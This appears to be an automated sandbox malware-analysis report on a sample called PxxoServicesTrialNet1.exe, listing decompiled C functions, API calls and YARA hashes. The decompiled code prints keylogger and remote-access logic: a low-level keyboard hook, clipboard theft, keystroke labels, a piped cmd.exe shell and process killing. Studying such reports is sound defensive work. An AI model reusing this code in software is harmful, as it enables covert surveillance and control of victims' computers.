                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@?resize@?$basic_string@BufferHeaderPrepare
                                        • String ID:
                                        • API String ID: 1952094867-0
                                        • Opcode ID: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                        • Instruction ID: 8f998c45a3acb3b0b10d37a494ac82bd1c86fe74dd73c150e7a1b96005ae6754
                                        • Opcode Fuzzy Hash: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                        • Instruction Fuzzy Hash: 83111835600644FFCB159F65EC689E67BE6EB89394702C83DED0A87365DB31A801CBD8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004052D5, Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E004052D5(intOrPtr* __ecx) {
				struct tagMSG _v32;
				intOrPtr* _t14;

				_t14 = __ecx;
				 *0x41b9a8 = __ecx;
				if( *__ecx != 0) {
					L3:
					if(GetMessageA( &_v32, 0, 0, 0) != 0) {
						TranslateMessage( &_v32);
						DispatchMessageA( &_v32);
						goto L2;
					}
				} else {
					 *_t14 = SetWindowsHookExA(0xd, E004052BA, 0, 0);
					L2:
					if( *_t14 != 0) {
						goto L3;
					}
				}
				return 0;
			}





                                        0x004052dd
                                        0x004052e1
                                        0x004052e9
                                        0x00405300
                                        0x0040530f
                                        0x00405315
                                        0x0040531f
                                        0x00000000
                                        0x0040531f
                                        0x004052eb
                                        0x004052fa
                                        0x004052fc
                                        0x004052fe
                                        0x00000000
                                        0x00000000
                                        0x004052fe
                                        0x0040532c

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Message$DispatchHookTranslateWindows
                                        • String ID:
                                        • API String ID: 1978648212-0
                                        • Opcode ID: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                        • Instruction ID: 3f8d98675bb246c8319de4d6d7df696f93bc8797274e956dc3fa59b7a05fdffb
                                        • Opcode Fuzzy Hash: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                        • Instruction Fuzzy Hash: 5DF03071900A05EBC7205FA6AC0CEDBBBFCEBD5B42B50443EA885E2190E6788441CF68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B5A2, Relevance: 6.0, APIs: 4, Instructions: 37registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 18%
                                        			E0040B5A2(intOrPtr _a4, void* _a8, short* _a12, char _a15, short* _a16) {
				int _v8;
				char _v2056;

				_v8 = 0x400;
				if(RegOpenKeyExW(_a8, _a12, 0, 0x20019,  &_a8) != 0) {
					_push( &_a15);
					_push(0x415800);
				} else {
					RegQueryValueExW(_a8, _a16, 0, 0,  &_v2056,  &_v8);
					RegCloseKey(_a8);
					_push( &_a15);
					_push( &_v2056);
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z();
				return _a4;
			}





                                        0x0040b5ae
                                        0x0040b5cb
                                        0x0040b601
                                        0x0040b602
                                        0x0040b5cd
                                        0x0040b5e2
                                        0x0040b5eb
                                        0x0040b5f4
                                        0x0040b5fb
                                        0x0040b5fb
                                        0x0040b60a
                                        0x0040b614

                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                        • RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                        • RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$??0?$basic_string@CloseG@1@@G@2@@std@@G@std@@OpenQueryU?$char_traits@Value
                                        • String ID:
                                        • API String ID: 4081865614-0
                                        • Opcode ID: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                        • Instruction ID: 08c4fdd74f089b672de4800a8e1209c34edbbd410ac70e3f0c9e675f1f7a205c
                                        • Opcode Fuzzy Hash: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                        • Instruction Fuzzy Hash: 3D01F67554010EFFDB11DF90ED45FDA7BBCFB08304F508062BA05AA1A0D770AA199B98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D87E, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E0040D87E() {
				char _t9;
				void* _t22;
				void* _t28;
				intOrPtr _t29;

				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t22 - 0x10, _t28, 1));
				_t29 =  *0x41b889; // 0x0
				if(_t29 == 0) {
					_t9 = E0040180C(_t22 - 0x10, _t29, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E00402B8A(_t9);
				}
				E004017DD(_t22 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}







                                        0x0040d88e
                                        0x0040d896
                                        0x0040d89c
                                        0x0040d8a6
                                        0x0040d8b1
                                        0x0040d8b7
                                        0x0040e597
                                        0x0040e6a4
                                        0x0040e6ac
                                        0x0040e6b5
                                        0x0040e6c1

                                        APIs
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040D88E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D8B1
                                          • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
                                          • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                          • Part of subcall function 00402B8A: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                          • Part of subcall function 00402B8A: getenv.MSVCRT ref: 00402C34
                                          • Part of subcall function 00402B8A: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                          • Part of subcall function 00402B8A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                          • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                          • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                          • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                          • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CreateD@1@@PipeV01@@$??8std@@D@2@@0@V?$basic_string@Y?$basic_string@getenv
                                        • String ID:
                                        • API String ID: 187635395-0
                                        • Opcode ID: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                        • Instruction ID: 95a58a3f9309c0e5762bae13ef1d8417c4b6d23d487987f94e594afc93633c1a
                                        • Opcode Fuzzy Hash: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                        • Instruction Fuzzy Hash: 22F03A7191011CCBD704BBA6ECA99EE7B34EB64355B404C3BE412A20E1EBB90525CA5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041358B, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$?begin@?$basic_string@G@1@@$?c_str@?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                        • String ID:
                                        • API String ID: 384503197-0
                                        • Opcode ID: 2dfa9e07ec5e251ddcfc6defdda0276f547ce66a674e16cb6872e78d440df24c
                                        • Instruction ID: e9850064b0a36303cd24c251ff0e0265422eee26172e2298965a0cd1febf68d2
                                        • Opcode Fuzzy Hash: 2dfa9e07ec5e251ddcfc6defdda0276f547ce66a674e16cb6872e78d440df24c
                                        • Instruction Fuzzy Hash: 30F0DA7141021EEBCF04EFA0EC49CEE7779FB48254B444429F926D20A0EB75A659CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00406BEF, Relevance: 6.0, APIs: 4, Instructions: 27clipboardCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 27%
                                        			E00406BEF(void* __ecx, intOrPtr _a4) {
				char _v5;
				void* _t15;

				if(OpenClipboard(0) == 0) {
					L3:
					_push( &_v5);
					_push(0x415664);
				} else {
					_t15 = GetClipboardData(1);
					CloseClipboard();
					if(_t15 == 0) {
						goto L3;
					} else {
						_push( &_v5);
						_push(_t15);
					}
				}
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				return _a4;
			}





                                        0x00406bfe
                                        0x00406c1b
                                        0x00406c1e
                                        0x00406c1f
                                        0x00406c00
                                        0x00406c08
                                        0x00406c0a
                                        0x00406c12
                                        0x00000000
                                        0x00406c14
                                        0x00406c17
                                        0x00406c18
                                        0x00406c18
                                        0x00406c12
                                        0x00406c27
                                        0x00406c32

                                        APIs
                                        • OpenClipboard.USER32(00000000), ref: 00406BF6
                                        • GetClipboardData.USER32 ref: 00406C02
                                        • CloseClipboard.USER32(?,00406C77,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C0A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,00406C77,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C27
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Clipboard$V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@DataOpenU?$char_traits@
                                        • String ID:
                                        • API String ID: 1727351239-0
                                        • Opcode ID: d31ff5e3c6f90f495a0499d15105459c1e1ba467a64aad7b936036200359d4d3
                                        • Instruction ID: d068d5d9f876e73b388ef04ee2f39e673df6a44b067aa838ba22f5a803aba3f5
                                        • Opcode Fuzzy Hash: d31ff5e3c6f90f495a0499d15105459c1e1ba467a64aad7b936036200359d4d3
                                        • Instruction Fuzzy Hash: 05E03075504615EFE7409B50DC49FDA7BACDB85B52F408035B90ADA280D7749980CAA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004054E9, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                        • SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@V01@@Y?$basic_string@$??1?$basic_string@Event
                                        • String ID:
                                        • API String ID: 3911305588-0
                                        • Opcode ID: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                        • Instruction ID: de7088bd0e13ff88ad3ed09bf1a5158b73f18205d37a60fa436fa72f9884fc0a
                                        • Opcode Fuzzy Hash: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                        • Instruction Fuzzy Hash: 06F08231400B49EFCB11DF60D848AD77FA8EF05244F448469E48382961D774F588CF98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D7C0, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 46%
                                        			E0040D7C0(void* __eflags) {
				char* _t5;
				void* _t20;

				_t5 = E0040180C(_t20 - 0x10, __eflags, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E004126BC(atoi(_t5));
				E004017DD(_t20 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                        0x0040d7c5
                                        0x0040d7cc
                                        0x0040d7da
                                        0x0040e6a4
                                        0x0040e6ac
                                        0x0040e6b5
                                        0x0040e6c1

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D7CC
                                        • atoi.MSVCRT ref: 0040D7D3
                                          • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                          • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
                                          • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@Process$?c_str@?$basic_string@CloseHandleOpenTerminateatoi
                                        • String ID:
                                        • API String ID: 1377568529-0
                                        • Opcode ID: 564291607d9638d041430aad6149658f0cca5fd975ad9575967f8846513cae85
                                        • Instruction ID: 2746f951d2caaa68166efb6d96d37f5946b4e222a380c15f16ac4a6add4f85c7
                                        • Opcode Fuzzy Hash: 564291607d9638d041430aad6149658f0cca5fd975ad9575967f8846513cae85
                                        • Instruction Fuzzy Hash: 54E0ED72914519CBCB04ABE1EC599ED7324EB90316F50483FE112E60E1EE785555CB1C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040DCD4, Relevance: 6.0, APIs: 4, Instructions: 23sleepCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E0040DCD4() {
				void* _t15;
				intOrPtr _t19;

				E0040AC8C();
				exit(0);
				while(1) {
					_t19 =  *0x41beb8; // 0x0
					if(_t19 == 0) {
						break;
					}
					Sleep(0x64);
				}
				E00408245();
				E004017DD(_t15 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                        0x0040dcd4
                                        0x0040dcdb
                                        0x0040dce3
                                        0x0040dce3
                                        0x0040dce9
                                        0x00000000
                                        0x00000000
                                        0x0040dced
                                        0x0040dced
                                        0x0040dcf5
                                        0x0040e6a4
                                        0x0040e6ac
                                        0x0040e6b5
                                        0x0040e6c1

                                        APIs
                                          • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                          • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                        • exit.MSVCRT ref: 0040DCDB
                                        • Sleep.KERNEL32(00000064), ref: 0040DCED
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ObjectProcessSingleSleepTerminateWaitexit
                                        • String ID:
                                        • API String ID: 772260455-0
                                        • Opcode ID: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                        • Instruction ID: 3edd35d2a09f3996059eabe09ae33406840b09248e651dbbdf397ea46066b4da
                                        • Opcode Fuzzy Hash: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                        • Instruction Fuzzy Hash: 8DE0E531918619DFE304ABE1ED59BDD7730AB60346F50443AE603A60E1DAF9051ADB1A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00406B61, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [LCtrl] ,?), ref: 00406B97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                        • String ID: [LCtrl] $ [RCtrl]
                                        • API String ID: 4257247948-618823999
                                        • Opcode ID: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                        • Instruction ID: 4f70cad60a3ff704afd3fe8ce3074508994e3182d9d4e745bddae8050266d9bd
                                        • Opcode Fuzzy Hash: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                        • Instruction Fuzzy Hash: 60E092B17106147FEA14A66DD81BEFF36BCDB80754F40017AE802E72C1D9E96D4086EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D8C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,00000001), ref: 0040D8E1
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D8EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@?c_str@?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?length@?$basic_string@ExecuteG@1@@ShellV01@@
                                        • String ID: open
                                        • API String ID: 317973523-2758837156
                                        • Opcode ID: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                        • Instruction ID: 6a6c3e705ca9fa4d3d03dab41846ccb6958ded06a858cdbf50d377e36584e32d
                                        • Opcode Fuzzy Hash: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                        • Instruction Fuzzy Hash: 5BE04F71504608EEDB056AB09CC5DFA336CA744345F50056AB006A20D1D9744D454628
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Analysis Process: PxxoServicesTrialNet1.exe PID: 5772 Parent PID: 3400 PxxoServicesTrialNet1.exeCOMMON

                                        Executed Functions

                                        Function 014EBC60, Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,014ECDB7,00000000,00000000), ref: 014ECF08
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: InformationThread
                                        • String ID:
                                        • API String ID: 4046476035-0
                                        • Opcode ID: 8f5c36db4958cc86623c3baa34e84cc6b22ab0534ce8b6ed62031c37851ae750
                                        • Instruction ID: 05d4bb22bb185b949e6d98d46976e9b5e38e7efe52d3357a2656bf0cda32a599
                                        • Opcode Fuzzy Hash: 8f5c36db4958cc86623c3baa34e84cc6b22ab0534ce8b6ed62031c37851ae750
                                        • Instruction Fuzzy Hash: 121104B19042089FCB10DF9AC488BDFBBF5FB48324F14842AE559A7350C375A955CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 014EFBF4, Relevance: 1.8, APIs: 1, Instructions: 262processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 014EFE36
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: db5a25657d8db2fb8eac58be54464a67600c8191c513c2cbf39513989dd15397
                                        • Instruction ID: 64a565686438843eeaaa0c4029f304e7b1845571a173f1eff8e8af429bae3d83
                                        • Opcode Fuzzy Hash: db5a25657d8db2fb8eac58be54464a67600c8191c513c2cbf39513989dd15397
                                        • Instruction Fuzzy Hash: A9A17C71D002198FDF20CFA8C844BEEBBF2BF48315F1485AAE819A7250D7759989CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 014EFC00, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 014EFE36
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 313292c08493eee968fc8c98ae7350d41dde9aef9dfb3d2743214446e82b8ee4
                                        • Instruction ID: be00107264f0dbcce1a11b8484e9e4340ace5e655a3d1f9d3355a535c7192015
                                        • Opcode Fuzzy Hash: 313292c08493eee968fc8c98ae7350d41dde9aef9dfb3d2743214446e82b8ee4
                                        • Instruction Fuzzy Hash: 9C915C71D002198FDF24CF68C844BEEBBF2BB48315F1485AAE819A7350D7759989CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 06601230, Relevance: 1.7, APIs: 1, Instructions: 234COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserExceptionDispatcher.NTDLL ref: 06601299
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.774176927.0000000006600000.00000040.00000001.sdmp, Offset: 06600000, based on PE: false
                                        Similarity
                                        • API ID: DispatcherExceptionUser
                                        • String ID:
